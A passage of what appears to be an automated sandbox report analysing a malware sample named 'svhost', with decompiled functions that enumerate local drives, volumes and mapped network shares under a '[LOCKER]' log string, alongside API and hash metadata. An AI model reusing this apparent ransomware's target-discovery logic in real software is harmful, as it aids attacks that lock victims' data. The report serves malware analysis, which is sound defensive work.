                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: 5
                                      • API String ID: 3172100163-2308513669
                                      • Opcode ID: 238ea9f06b58ed4b1a6e00a01d97e772e0658e5dac597edf80412c28894f2b73
                                      • Instruction ID: ee881af205701733a000742e34d597012d04f1b45b487fee05877f316e22321c
                                      • Opcode Fuzzy Hash: 238ea9f06b58ed4b1a6e00a01d97e772e0658e5dac597edf80412c28894f2b73
                                      • Instruction Fuzzy Hash: 0441B3B5E00109AFCB08DFA8D8919EEB7F5EF48300F149569E919B7351DA30AA05CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6C020 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E00E6C020(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v16;
				signed int _v20;
				char _v32;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v141;
				char _v142;
				char* _v148;
				char _v149;
				intOrPtr _v156;
				char* _v160;
				intOrPtr _v164;
				signed int _t45;
				signed int _t46;
				signed char _t66;
				void* _t77;
				void* _t78;
				signed int _t118;
				void* _t119;
				void* _t120;

				_t117 = __esi;
				_t116 = __edi;
				_t81 = __ebx;
				_push(0xffffffff);
				_push(0xec16d0);
				_push( *[fs:0x0]);
				_t120 = _t119 - 0x94;
				_t45 =  *0xeef074; // 0x221cac15
				_t46 = _t45 ^ _t118;
				_v20 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_v156 = __ecx;
				_v141 = 0;
				E00E515C0( &_v32, 0xc);
				E00E6C770(__ebx, _v156, __edi, __esi,  &_v32);
				E00E515C0( &_v44, 0xc);
				E00E6C2A0(__ebx, _v156, __edi, __esi,  &_v44);
				_t114 =  &_v44;
				_v160 =  &_v44;
				_v148 = E00E51BE0(_v160);
				_v164 = E00E51BF0(_v160);
				while(1) {
					_t123 = _v148 - _v164;
					if(_v148 == _v164) {
						break;
					}
					_t114 = _v148;
					E00E6C1F0(_t123, _v148);
					if((E00E579A0( &_v92) & 0x000000ff) != 0) {
						_t66 = E00E565B0( &_v32);
						_t125 = _t66 & 0x000000ff;
						if((_t66 & 0x000000ff) == 0) {
							E00E57DE0(_t81,  &_v68, _t116, _t117, _t125, E00E6CAC0( &_v32));
							E00E6CAF0( &_v32);
							E00E517B0(E00E517B0(E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v149), "[LOCKER] Assign device "),  &_v116), " letter "),  &_v68), L"\n\n");
							_t77 = E00E51650( &_v68);
							_t114 =  &_v116;
							_t78 = E00E51650( &_v116);
							_t120 = _t120 + 8;
							E00E6C990(_v156, _t78, _t77);
							_v141 = 1;
							E00E57B40( &_v68);
						}
					}
					E00E6C270( &_v140);
					_v148 = _v148 + 0x48;
				}
				_v142 = _v141;
				E00E6CAA0( &_v44);
				E00E578B0( &_v32);
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t118;
				return E00E89A35(_t81, _v20 ^ _t118, _t114, _t116, _t117);
			}


























                                      0x00e6c020
                                      0x00e6c020
                                      0x00e6c020
                                      0x00e6c023
                                      0x00e6c025
                                      0x00e6c030
                                      0x00e6c031
                                      0x00e6c037
                                      0x00e6c03c
                                      0x00e6c03e
                                      0x00e6c041
                                      0x00e6c045
                                      0x00e6c04b
                                      0x00e6c051
                                      0x00e6c05d
                                      0x00e6c06c
                                      0x00e6c076
                                      0x00e6c085
                                      0x00e6c08a
                                      0x00e6c08d
                                      0x00e6c09e
                                      0x00e6c0af
                                      0x00e6c0c6
                                      0x00e6c0cc
                                      0x00e6c0d2
                                      0x00000000
                                      0x00000000
                                      0x00e6c0d8
                                      0x00e6c0e5
                                      0x00e6c0f7
                                      0x00e6c100
                                      0x00e6c108
                                      0x00e6c10a
                                      0x00e6c11c
                                      0x00e6c124
                                      0x00e6c169
                                      0x00e6c172
                                      0x00e6c17b
                                      0x00e6c17f
                                      0x00e6c184
                                      0x00e6c18e
                                      0x00e6c193
                                      0x00e6c19d
                                      0x00e6c19d
                                      0x00e6c10a
                                      0x00e6c1a8
                                      0x00e6c0c0
                                      0x00e6c0c0
                                      0x00e6c1b8
                                      0x00e6c1c1
                                      0x00e6c1c9
                                      0x00e6c1d7
                                      0x00e6c1e2
                                      0x00e6c1ec

                                      APIs
                                        • Part of subcall function 00E6C770: GetLogicalDrives.KERNEL32 ref: 00E6C7B9
                                        • Part of subcall function 00E6C770: std::ios_base::good.LIBCPMTD ref: 00E6C7FD
                                        • Part of subcall function 00E6C770: _Smanip.LIBCPMTD ref: 00E6C82B
                                        • Part of subcall function 00E6C770: task.LIBCPMTD ref: 00E6C864
                                        • Part of subcall function 00E6C2A0: FindFirstVolumeW.KERNEL32(?,00000104,0000000C,?,221CAC15), ref: 00E6C31D
                                        • Part of subcall function 00E6C2A0: FindVolumeClose.KERNEL32(000000FF), ref: 00E6C53F
                                      • std::ios_base::good.LIBCPMTD ref: 00E6C0ED
                                      • task.LIBCPMTD ref: 00E6C19D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FindVolumestd::ios_base::goodtask$CloseDrivesFirstLogicalSmanip
                                      • String ID: letter $[LOCKER] Assign device
                                      • API String ID: 4123301681-874473924
                                      • Opcode ID: b7d4684c3aaf88db6ebc63b3f3960ed11b03816876156008c6f1373c25041c90
                                      • Instruction ID: a4968fec6c02dfdc3a9c6812df651d0e4eaae4c4a66f8fb6c50d88f2414927e8
                                      • Opcode Fuzzy Hash: b7d4684c3aaf88db6ebc63b3f3960ed11b03816876156008c6f1373c25041c90
                                      • Instruction Fuzzy Hash: A2414B70D002588ACB14EBA4DC52BFEB7B5AF45340F5465A9A44AB7282EF346A49CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E66CF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101shareCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E00E66CF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v16;
				signed int _v20;
				short _v24;
				short _v28;
				char _v52;
				int _v56;
				char _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t39;
				signed int _t40;
				intOrPtr* _t52;
				signed int _t95;

				_t103 = __eflags;
				_t94 = __esi;
				_t93 = __edi;
				_t64 = __ebx;
				_push(0xffffffff);
				_push(0xec10c0);
				_push( *[fs:0x0]);
				_t39 =  *0xeef074; // 0x221cac15
				_t40 = _t39 ^ _t95;
				_v20 = _t40;
				_push(_t40);
				_t2 =  &_v16; // 0xe66c23
				 *[fs:0x0] = _t2;
				_v72 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_t6 =  &_a8; // 0xe66c23
				 *((short*)(_t95 + 0xffffffffffffffe8)) =  *_t6;
				 *((short*)(_t95 + 0xbadb95)) = 0x3a;
				_v56 = 0x104;
				E00E57C30(__ebx,  &_v52, __edi, __esi, __eflags, _v56, 0);
				WNetGetConnectionW( &_v28, E00E57A90( &_v52, 0),  &_v56);
				_v58 = 0;
				_v64 =  *((intOrPtr*)(E00E67050( &_v76,  &_v52)));
				_t52 = E00E67050( &_v80,  &_v52);
				_v68 =  *((intOrPtr*)(E00E67070(__ebx, __edi, __esi, _t103,  &_v88,  *((intOrPtr*)(E00E67030( &_v84,  &_v52))),  *_t52,  &_v58)));
				E00E66E20(__ebx,  &_v52, __edi, __esi, _t103,  &_v92, _v68, _v64);
				E00E57BA0(_a4, E00E51650( &_v52));
				E00E57B40( &_v52);
				_t36 =  &_v16; // 0xe66c23
				 *[fs:0x0] =  *_t36;
				return E00E89A35(_t64, _v20 ^ _t95, _v68, _t93, _t94);
			}






















                                      0x00e66cf0
                                      0x00e66cf0
                                      0x00e66cf0
                                      0x00e66cf0
                                      0x00e66cf3
                                      0x00e66cf5
                                      0x00e66d00
                                      0x00e66d04
                                      0x00e66d09
                                      0x00e66d0b
                                      0x00e66d0e
                                      0x00e66d0f
                                      0x00e66d12
                                      0x00e66d18
                                      0x00e66d1d
                                      0x00e66d20
                                      0x00e66d2c
                                      0x00e66d30
                                      0x00e66d42
                                      0x00e66d47
                                      0x00e66d57
                                      0x00e66d6f
                                      0x00e66d77
                                      0x00e66d8d
                                      0x00e66d9c
                                      0x00e66dc8
                                      0x00e66dda
                                      0x00e66def
                                      0x00e66df7
                                      0x00e66dff
                                      0x00e66e02
                                      0x00e66e17

                                      APIs
                                      • WNetGetConnectionW.MPR(00EC10C0,00000000,00000000), ref: 00E66D6F
                                        • Part of subcall function 00E67070: _Find_unchecked.LIBCPMTD ref: 00E670BA
                                      • task.LIBCPMTD ref: 00E66DF7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConnectionFind_uncheckedtask
                                      • String ID: #l$#l
                                      • API String ID: 3799698842-189179905
                                      • Opcode ID: ba6c28e2cc6f3bbe7243bc399d57207b180d6c49d60ca0e45f89952acbf5383f
                                      • Instruction ID: a0b3e00a0bf5dd2b84ce0676173e30a15cff4258d6e9c8da9176d1e3d42bfa05
                                      • Opcode Fuzzy Hash: ba6c28e2cc6f3bbe7243bc399d57207b180d6c49d60ca0e45f89952acbf5383f
                                      • Instruction Fuzzy Hash: 7041FFB6D24108AFCB04EFE4E991FEEB7B9FF58704F005529F506A7251EA305604CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E59320 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E59320(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v48;
				signed int _t45;
				signed int _t96;

				_t95 = __esi;
				_t94 = __edi;
				_t69 = __ebx;
				_t45 =  *0xeef074; // 0x221cac15
				_v8 = _t45 ^ _t96;
				_v24 = __ecx;
				_v16 = E00E51100(_v24);
				_v28 = E00E51100(_a4);
				_t7 =  &_v28; // 0xe57e5c
				_v20 =  *((intOrPtr*)( *_t7 + 0x10));
				_t10 =  &_v28; // 0xe57e5c
				_v36 = E00E58DB0( *_t10);
				if(_v20 >= 8) {
					_v32 = E00E56580(_v24);
					_v44 = E00E59FC0(__ebx, _v24, __edi, __esi);
					_v48 = _v20 | 0x00000007;
					_v40 =  *((intOrPtr*)(E00E5A210( &_v48,  &_v44)));
					_v12 = E00E5A120(_v32, _v40 + 1);
					E00E5B410(_v16, _v32, E00E51650(_v16),  &_v12);
					E00E5A100(E00E51650(_v12), _v36, _v20 + 1);
					 *(_v16 + 0x10) = _v20;
					_t92 = _v16;
					 *((intOrPtr*)(_v16 + 0x14)) = _v40;
				} else {
					E00E5A100(_v16, _v36, 8);
					_t92 = _v20;
					 *(_v16 + 0x10) = _v20;
					 *((intOrPtr*)(_v16 + 0x14)) = 7;
				}
				return E00E89A35(_t69, _v8 ^ _t96, _t92, _t94, _t95);
			}
















                                      0x00e59320
                                      0x00e59320
                                      0x00e59320
                                      0x00e59326
                                      0x00e5932d
                                      0x00e59330
                                      0x00e5933b
                                      0x00e59346
                                      0x00e59349
                                      0x00e5934f
                                      0x00e59352
                                      0x00e5935a
                                      0x00e59361
                                      0x00e59395
                                      0x00e593a0
                                      0x00e593a9
                                      0x00e593be
                                      0x00e593d0
                                      0x00e593e8
                                      0x00e59408
                                      0x00e59416
                                      0x00e59419
                                      0x00e5941f
                                      0x00e59363
                                      0x00e5936d
                                      0x00e59378
                                      0x00e5937b
                                      0x00e59381
                                      0x00e59381
                                      0x00e5942f

                                      APIs
                                      • _Min_value.LIBCPMTD ref: 00E593B4
                                      • allocator.LIBCONCRTD ref: 00E593CB
                                      • construct.LIBCPMTD ref: 00E593E8
                                        • Part of subcall function 00E5A100: _wmemmove.LIBCMTD ref: 00E5A10F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Min_value_wmemmoveallocatorconstruct
                                      • String ID: \~
                                      • API String ID: 3937789765-3289573539
                                      • Opcode ID: 3c98d77a5a41e3627661661d4bb4589092f134af614967d8ae0d26ae1ed6d4ce
                                      • Instruction ID: 24e1e25395a58017309d279d9d3c8d6670b826e9941c003e01dc3dd69fb1f1d6
                                      • Opcode Fuzzy Hash: 3c98d77a5a41e3627661661d4bb4589092f134af614967d8ae0d26ae1ed6d4ce
                                      • Instruction Fuzzy Hash: 6B31ECB5D002089FCB04DFA4D9929EEB7F5FF48301F149969E915B7341EB31AA04CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E71438 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E00E71438(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* _t9;
				intOrPtr* _t10;
				intOrPtr* _t11;
				intOrPtr* _t12;
				intOrPtr* _t14;
				void* _t22;

				_push(8);
				E00E8A3C2();
				 *((intOrPtr*)(_t22 - 4)) = 0;
				_t9 = E00EA0A80(__eflags);
				_t26 =  *_t9;
				if( *_t9 == 0) {
					L5:
					_t10 =  *((intOrPtr*)(_t22 + 8));
					 *_t10 = 0;
					 *((intOrPtr*)(_t10 + 4)) = 0;
				} else {
					_t11 = E00EA0A89(_t26);
					_t27 =  *_t11;
					if( *_t11 != 0) {
						goto L5;
					} else {
						_t12 = E00EA0A80(_t27);
						_t28 =  *((intOrPtr*)( *_t12)) - 0xe0434f4d;
						if( *((intOrPtr*)( *_t12)) == 0xe0434f4d) {
							goto L5;
						} else {
							_t14 = E00EA0A80(_t28);
							_t29 =  *((intOrPtr*)( *_t14)) - 0xe0434352;
							if( *((intOrPtr*)( *_t14)) == 0xe0434352) {
								goto L5;
							} else {
								 *((char*)(_t22 - 0x11)) = 1;
								_push(_t22 - 0x11);
								_push(E00EA0A80(_t29));
								_push( *((intOrPtr*)(_t22 + 8)));
								E00E71012(__ecx, __edx, _t29);
								_t10 =  *((intOrPtr*)(_t22 + 8));
							}
						}
					}
				}
				E00E8A331();
				return _t10;
			}









                                      0x00e71438
                                      0x00e7143f
                                      0x00e71446
                                      0x00e71449
                                      0x00e7144e
                                      0x00e71450
                                      0x00e714b2
                                      0x00e714b2
                                      0x00e714b5
                                      0x00e714b7
                                      0x00e71452
                                      0x00e71452
                                      0x00e71457
                                      0x00e71459
                                      0x00000000
                                      0x00e7145b
                                      0x00e7145b
                                      0x00e71462
                                      0x00e71468
                                      0x00000000
                                      0x00e7146a
                                      0x00e7146a
                                      0x00e71471
                                      0x00e71477
                                      0x00000000
                                      0x00e71479
                                      0x00e7147c
                                      0x00e71480
                                      0x00e71486
                                      0x00e71487
                                      0x00e7148a
                                      0x00e71492
                                      0x00e71492
                                      0x00e71477
                                      0x00e71468
                                      0x00e71459
                                      0x00e714ba
                                      0x00e714bf

                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 00E7143F
                                      • make_shared.LIBCPMT ref: 00E7148A
                                        • Part of subcall function 00E71012: __EH_prolog3.LIBCMT ref: 00E71019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prolog3H_prolog3_catchmake_shared
                                      • String ID: MOC$RCC
                                      • API String ID: 1798871530-2084237596
                                      • Opcode ID: ffb449abe9d41da0bbf715f061cbc3d86f178972671b2072397cd2c82b77e086
                                      • Instruction ID: 163e9c57fa82bc6510f3cc18379ef047b74a70b15f0d5787312753873dd8d7a3
                                      • Opcode Fuzzy Hash: ffb449abe9d41da0bbf715f061cbc3d86f178972671b2072397cd2c82b77e086
                                      • Instruction Fuzzy Hash: 24F03C30604354CFCB22EBA8C40195C36A4AF06700F05A1E5F418BF221D73CAD858BA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E526E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E526E0(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				void* _t14;

				_v8 = __ecx;
				_t14 = E00E7198F(__ecx, _v8);
				if(_t14 != 0) {
					_v16 = _v8;
					_v12 = _v16;
					_t28 = _v12;
					if(_v12 == 0) {
						_v20 = 0;
					} else {
						_v20 = E00E527D0(_v12, _t28, 1);
					}
					E00E51AE0( &_v32, "Fail to schedule the chore!");
					return E00EA0C81( &_v32, 0xeeda64);
				}
				return _t14;
			}









                                      0x00e526e6
                                      0x00e526ed
                                      0x00e526f7
                                      0x00e526fc
                                      0x00e52702
                                      0x00e52705
                                      0x00e52709
                                      0x00e5271a
                                      0x00e5270b
                                      0x00e52715
                                      0x00e52715
                                      0x00e52729
                                      0x00000000
                                      0x00e52737
                                      0x00e5273f

                                      APIs
                                        • Part of subcall function 00E7198F: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00E719B6
                                      • Concurrency::wait.LIBCONCRTD ref: 00E52710
                                        • Part of subcall function 00E527D0: std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E527DA
                                      • std::bad_exception::bad_exception.LIBCMTD ref: 00E52729
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E52737
                                      Strings
                                      • Fail to schedule the chore!, xrefs: 00E52721
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_Concurrency::waitException@8Reschedule_choreThrowstd::bad_exception::bad_exceptionstd::exception_ptr::~exception_ptr
                                      • String ID: Fail to schedule the chore!
                                      • API String ID: 892878918-3313369819
                                      • Opcode ID: 3eb3a2d5ac586805b43375999f6b9826a4f7df1f431920701c0d1fbd23dab8a6
                                      • Instruction ID: 68226881a6fc5d8bd5cbdb11c694e1f28efecc430f0f8f6a342c6da58c987ae4
                                      • Opcode Fuzzy Hash: 3eb3a2d5ac586805b43375999f6b9826a4f7df1f431920701c0d1fbd23dab8a6
                                      • Instruction Fuzzy Hash: 28F06270D0430CABCB00EFD4D8417ADB7B4AB14301F1055ADED1577281D7B46A09DB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E66BA0 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E00E66BA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v21;
				char _v36;
				char _v60;
				signed int _v64;
				signed int _v68;
				char _v69;
				char _v74;
				char _v76;
				signed int _v80;
				intOrPtr _v84;
				char _v92;
				signed int _t40;
				signed int _t41;
				signed char _t54;
				signed int* _t57;
				void* _t61;
				void* _t64;
				void* _t66;
				void* _t97;
				void* _t98;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t98 = __esi;
				_t97 = __edi;
				_t66 = __ebx;
				_push(0xffffffff);
				_push(0xec10c0);
				_push( *[fs:0x0]);
				_t101 = _t100 - 0x4c;
				_t40 =  *0xeef074; // 0x221cac15
				_t41 = _t40 ^ _t99;
				_v20 = _t41;
				_push(_t41);
				 *[fs:0x0] =  &_v16;
				_v84 = __ecx;
				_v69 = 0;
				E00E515C0( &_v36, 0xc);
				E00E566A0( &_v36);
				_v80 = GetLogicalDrives();
				_v68 = 0;
				while(1) {
					_t103 = _v68 - 0x1a;
					if(_v68 >= 0x1a) {
						break;
					}
					_v64 = (_v68 & 0x0000ffff) + 0x41;
					E00E66CF0(_t66,  &_v21, _t97, _t98, _t103,  &_v60, _v64 & 0x0000ffff);
					_t54 = E00E579A0( &_v60);
					_t91 = _t54 & 0x000000ff;
					if((_t54 & 0x000000ff) != 0) {
						_t91 = 0x00000001 << _v68 & _v80;
						__eflags = 0x00000001 << _v68 & _v80;
						if(__eflags != 0) {
							_v76 = _v64;
							_t57 = E00E51BB0( &_v92,  &_v76,  &_v74);
							_push(_t57[1]);
							_t91 =  *_t57;
							E00E66E90( &_v60, _t97, _t98, __eflags,  *_t57);
							E00E66920( &_v60, L":\\");
							_t61 = E00E51650( &_v60);
							_t101 = _t101 + 4;
							E00E61E50( &_v36, _t61);
						}
					} else {
						_t64 = E00E51650( &_v60);
						_t101 = _t101 + 4;
						E00E61E50( &_v36, _t64);
					}
					E00E57B40( &_v60);
					_v68 = _v68 + 1;
				}
				E00E57460(_a4, E00E51650( &_v36));
				E00E578B0( &_v36);
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t99;
				return E00E89A35(_t66, _v20 ^ _t99, _t91, _t97, _t98);
			}




























                                      0x00e66ba0
                                      0x00e66ba0
                                      0x00e66ba0
                                      0x00e66ba3
                                      0x00e66ba5
                                      0x00e66bb0
                                      0x00e66bb1
                                      0x00e66bb4
                                      0x00e66bb9
                                      0x00e66bbb
                                      0x00e66bbe
                                      0x00e66bc2
                                      0x00e66bc8
                                      0x00e66bcd
                                      0x00e66bd5
                                      0x00e66bdd
                                      0x00e66be8
                                      0x00e66beb
                                      0x00e66bfd
                                      0x00e66bfd
                                      0x00e66c01
                                      0x00000000
                                      0x00000000
                                      0x00e66c0e
                                      0x00e66c1e
                                      0x00e66c26
                                      0x00e66c2b
                                      0x00e66c30
                                      0x00e66c53
                                      0x00e66c53
                                      0x00e66c56
                                      0x00e66c5c
                                      0x00e66c6b
                                      0x00e66c73
                                      0x00e66c74
                                      0x00e66c7a
                                      0x00e66c87
                                      0x00e66c90
                                      0x00e66c95
                                      0x00e66c9c
                                      0x00e66c9c
                                      0x00e66c32
                                      0x00e66c36
                                      0x00e66c3b
                                      0x00e66c42
                                      0x00e66c42
                                      0x00e66ca4
                                      0x00e66bfa
                                      0x00e66bfa
                                      0x00e66cbe
                                      0x00e66cc6
                                      0x00e66cd1
                                      0x00e66cdc
                                      0x00e66ce6

                                      APIs
                                      • GetLogicalDrives.KERNEL32 ref: 00E66BE2
                                        • Part of subcall function 00E66CF0: WNetGetConnectionW.MPR(00EC10C0,00000000,00000000), ref: 00E66D6F
                                        • Part of subcall function 00E66CF0: task.LIBCPMTD ref: 00E66DF7
                                      • std::ios_base::good.LIBCPMTD ref: 00E66C26
                                      • _Smanip.LIBCPMTD ref: 00E66C6B
                                      • task.LIBCPMTD ref: 00E66CA4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$ConnectionDrivesLogicalSmanipstd::ios_base::good
                                      • String ID:
                                      • API String ID: 280476529-0
                                      • Opcode ID: e0eabd28da7c1277302979a5f0c05a25988bde8aba040217ed797935427e1489
                                      • Instruction ID: 5ff4cda2334e6d7fffef187a51e86cf9ec2c8f0ff2853d8cfc1b8ac7b8dcf19d
